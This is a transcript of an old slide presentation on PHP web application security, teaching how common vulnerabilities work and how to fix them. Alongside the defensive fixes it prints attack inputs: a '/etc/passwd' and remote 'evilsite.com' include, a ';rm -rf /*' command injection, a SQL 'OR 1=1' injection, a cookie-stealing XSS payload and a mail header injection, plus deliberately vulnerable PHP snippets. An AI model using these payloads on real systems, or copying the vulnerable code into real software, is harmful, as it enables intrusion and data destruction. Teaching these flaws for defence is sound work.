Presentation is loading. Please wait.

Presentation is loading. Please wait.

PHP and Web Application Security An overview of various attacks that can affect web based applications (focusing on PHP) and how to counteract them Dominic.

Published byGwen Robertson Modified over 8 years ago

Similar presentations

Presentation on theme: "PHP and Web Application Security An overview of various attacks that can affect web based applications (focusing on PHP) and how to counteract them Dominic."— Presentation transcript:

1 PHP and Web Application Security An overview of various attacks that can affect web based applications (focusing on PHP) and how to counteract them Dominic Cleal

2 PHP and Web Application Security Dominic Cleal Areas to be covered ● Filename/include validation ● Unvalidated exec calls ● SQL injection ● Cross-site scripting attacks (XSS) ● Mail injection ● register_globals ● Cookies and session data ● Built-in security features ● Suhosin/Hardened- PHP ● Month of bugs

3 PHP and Web Application Security Dominic Cleal Filename/include validation ● Often occurs when reading in page names from the URL and trying to load them ● Example attacks: – index.php?page=/etc/passwd – index.php?page=http://evilsite.com/script.txt ● Can be stopped by requiring supplied page name is within a defined list ● allow_url_fopen can disable this, but is not totally secure

4 PHP and Web Application Security Dominic Cleal Filename/include validation <?php include('header.php'); include($_GET['page']); // unvalidated input used include('footer.php'); ?> <?php $validate = array('about.php', 'contact.php', 'products.php'); if (!in_array($_GET['page'], $validate)) // requires that the input is die('Invalid page specified'); // one of the allowed values include('header.php'); include($_GET['page']); include('footer.php'); ?> Default demo Remote demo Daemon demo

5 PHP and Web Application Security Dominic Cleal Unvalidated exec calls ● Very similar to the previous problem, except that this can give direct access to running commands on the system <?php system(“cal {$_GET['month']} {$_GET['year']}”); // ^ Completely unvalidated ?> ● What happens when the above is run with page.php?year=;rm -rf /* ?

6 PHP and Web Application Security Dominic Cleal SQL injection ● Common vulnerability, though often mitigated by PHP's built in “magic quotes” feature <?php $qry = mysql_query(“SELECT * FROM table “. WHERE field1 = {$_GET['field']}”); ?> ● Now run this with: page.php?field=1 OR 1=1 Demo link

7 PHP and Web Application Security Dominic Cleal SQL injection ● Magic quotes sanitises all input to the page (in $_GET/POST/COOKIE) by escaping quotation characters to avoid common injection techniques ● It is controlled by magic_quotes_gpc (enabled by default) ● Can cause problems when developers assume magic_quotes_gpc is enabled and the application is deployed to an unknown environment

8 PHP and Web Application Security Dominic Cleal Cross-site scripting (XSS) ● Very easy to do accidentally – just by printing the supplied user input back to the browser ● Can lead to account hijacking via cookies, arbitrary JavaScript execution under the trusted domain of the vulnerable site ● Use htmlentities and HTML encoding on all output back to the browser that could potentially contain unvalidated input

9 PHP and Web Application Security Dominic Cleal Cross-site scripting (XSS) <?php setcookie('sessionid', 'secretidnumber'); print “Your name is {$_GET['name']}”; ?> Now consider clicking a link and accessing: page.php?name= alert(document.cookie) Reflected demo link Stored demo link

10 PHP and Web Application Security Dominic Cleal Cross-site scripting (XSS) ● An alert box may look fairly harmless, but using simple JavaScript, cookie data could be sent to another web site via redirection for use with session hijacking ● Usually triggered by following a dangerous link from an external web site that sends you to the target web site ● URL obfuscation and encoding techniques can make it difficult to spot such dangerous links

11 PHP and Web Application Security Dominic Cleal Mail injection ● Scripts using the mail() function can often be easily abused by attackers to send spam through the script and server ● New lines can be supplied to the parameters passed into mail() from the user input (say, the recipient, sender, subject line) allowing the attacker to create new headers and change the body ● This gives the ability to change the recipients and use it for spamming

12 PHP and Web Application Security Dominic Cleal Mail injection <?php mail('webmaster@example.net', “Web message: {$_POST['subject']}”, $_POST['body']); ?> ● Now supply subject parameter with this: “Text%0ATo:user@example.net” ● This will cause the message to be sent to user@example.net as well as the original recipient ● Multiple headers (recipients, subject line) and even a new body can be prepended

13 PHP and Web Application Security Dominic Cleal register_globals ● Yes, this old nutshell.... ● Pre-PHP 4.2 issue, however the lesson learnt is still relevant for developers ● Any supplied parameters to the page would be saved into variables of the same name automatically ● e.g. page.php?var1=a&var2=b would create two variables, $var1 and $var2 initialised to 'a' and 'b' respectively

14 PHP and Web Application Security Dominic Cleal register_globals <?php if ($password == 'secret') $admin = true; /*... */ if ($admin) // allow user full control ?> ● Consider that $admin isn't initialised, so to gain admin access, you could access the page with: page.php?admin=true

15 PHP and Web Application Security Dominic Cleal Cookies and session data ● Cookies and their data are stored on the client system by their browser ● Session data is stored on the server, however a client side cookie is used to uniquely identify the client and access it ● Cookies are untrusted data, you do not know if the contents have been altered ● Sessions can be hijacked, however the data is only available to the server (and any other shared web sites)

16 PHP and Web Application Security Dominic Cleal Built-in security features ● safe_mode – includes extra UID/GID checks when opening files, tries to restrict execution of binaries to particular directories (broken by design) ● open_basedir – limits file operations to a particular set of directories, also broken by design ● Security features are easily bypassed, but are worth enabling – better than nothing

17 PHP and Web Application Security Dominic Cleal Suhosin/Hardened-PHP ● Patchset for PHP to increase security, mostly in the engine ● Suhosin supersedes Hardened-PHP ● Also allows you to disable eval/PCRE's /e ● Extra protection against remote include vulnerabilities and newline insertion into the mail() function ● Available in Debian Testing/Ubuntu Fiesty as php5-suhosin

18 PHP and Web Application Security Dominic Cleal Month of bugs ● A Hardened-PHP project initiative ● Revealing at least one security flaw per day during March ● Highlighting issues in the Zend engine, PHP core and extensions, not applications ● Some have been addressed in 5.2.1 and 4.4.5 released on 14 th February ● PHP Security team don't recognise or won't fix some vulnerabilities

19 PHP and Web Application Security Dominic Cleal Questions? ● Useful links: – http://uk.php.net/features.safe-mode – http://www.php-security.org/ – http://www.hardened-php.net/ – http://en.wikipedia.org/wiki/XSS

Download ppt "PHP and Web Application Security An overview of various attacks that can affect web based applications (focusing on PHP) and how to counteract them Dominic."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.

PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Prevent Cross-Site Scripting (XSS) attack

Prevent Cross-Site Scripting (XSS) attack
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.

Similar presentations

Ads by Google